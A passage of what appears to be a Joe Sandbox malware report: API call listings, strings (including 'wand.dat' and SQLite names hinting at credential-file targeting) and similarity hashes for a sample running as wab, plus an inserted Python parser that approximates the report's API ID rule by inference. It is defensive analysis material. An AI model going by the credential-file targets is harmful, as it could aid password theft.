                                                                                                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
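The API lists in these function entries are the raw material for two things a triager cares about: the "API ID" shown in each Similarity block (used to match functions across samples) and behaviour signatures such as "Contains functionality to dynamically determine API calls", which the GetSystemDirectoryW / LoadLibraryW / GetProcAddress / FreeLibrary sequence above triggers. The following is an added example, not code from the Joe Sandbox report or from Joe Security: a small Python parser for API lines in this report format, plus a reconstruction of the API ID grouping rule inferred from the entries on this page (drop the trailing W, split CamelCase, discard words shorter than four letters, order word groups by descending frequency, sort each group in ASCII order, join groups with "$"). That rule reproduces every API ID visible on this page but is an inference, not Joe Sandbox's documented algorithm; the handling of an "A" suffix, and the two call-sequence flags, are my own assumptions. The sample entry embedded below is copied from the shlwapi.dll function listed above.

```python
"""Parse Joe Sandbox 'APIs' lines and rebuild the Similarity 'API ID'.

Added example, not part of the Joe Sandbox report. The API ID rule is
INFERRED from this page's entries and is not Joe Security's published
algorithm; treat it as an approximation that happens to match them.
"""
import re
from collections import Counter

# One API line of the report, in the three shapes seen on this page:
#   • CreateFontIndirectW.GDI32(?), ref: 00401156
#   • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
#   • GetLastError.KERNEL32 ref: 0041810A
_API_LINE = re.compile(
    r"(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})"
)

# Constructed sample: the eight API lines of the shlwapi.dll entry above.
SAMPLE_ENTRY = """
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
"""


def parse_api_lines(text):
    """Return [(api, module, args, ref, parent_or_None)] for each API line."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.search(line)
        if m:
            calls.append((m["api"], m["module"], m["args"] or "", m["ref"], m["parent"]))
    return calls


def _words(api):
    # Drop the Unicode/ANSI suffix (W is what this page shows; A is an
    # assumption), split CamelCase, and keep lowercase C-runtime names
    # such as memset or _wcsicmp as a single word.
    if len(api) > 1 and api[-1] in "AW" and api[-2].islower():
        api = api[:-1]
    return re.findall(r"[A-Z][a-z0-9]*|[a-z_][a-z0-9_]*", api)


def api_id(apis, min_len=4):
    """Inferred rule: count words over all calls (duplicates count), drop
    words shorter than min_len (Get, Dlg, Sub, Map and Of never appear in
    the page's IDs), order groups by descending frequency, sort each
    group in ASCII order, and join the groups with '$'."""
    counts = Counter(w for a in apis for w in _words(a) if len(w) >= min_len)
    groups = {}
    for w, n in counts.items():
        groups.setdefault(n, []).append(w)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def suspicious_sequences(calls):
    """Flag call combinations that correspond to signatures in this report
    (my own mapping, not Joe Sandbox's rules)."""
    names = [c[0] for c in calls]
    findings = []
    if any(n.startswith("LoadLibrary") for n in names) and "GetProcAddress" in names:
        findings.append("dynamic API resolution (LoadLibrary + GetProcAddress)")
    if any(n.startswith("CreateFileMapping") for n in names) and "MapViewOfFile" in names:
        findings.append("file mapping created and mapped (shared memory / staging)")
    return findings


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_ENTRY)
    print("API ID :", api_id([c[0] for c in calls]))
    print("flags  :", suspicious_sequences(calls))
```

Feed it the API lines of any entry on this page and compare the result with the entry's own "API ID"; a mismatch means either the entry lists calls outside the visible text (as with the truncated first entry) or the inferred rule needs refining.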

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
• Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
• Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
• Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
• Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
• Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
• API String ID: 1889144086-0
• Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
• Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
• Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
• Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                                          • Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcslen.MSVCRT ref: 0040B1DE
• ??3@YAXPAX@Z.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040B224
• memcpy.MSVCRT ref: 0040B248
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocwcslen
• String ID:
• API String ID: 3023356884-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 0040B0D8
• ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
• ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
• memcpy.MSVCRT ref: 0040B159
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocstrlen
• String ID:
• API String ID: 1171893557-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 00414D9A
• SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
• wcscpy.MSVCRT ref: 00414DF3
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75B9DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75B9DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                          • Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
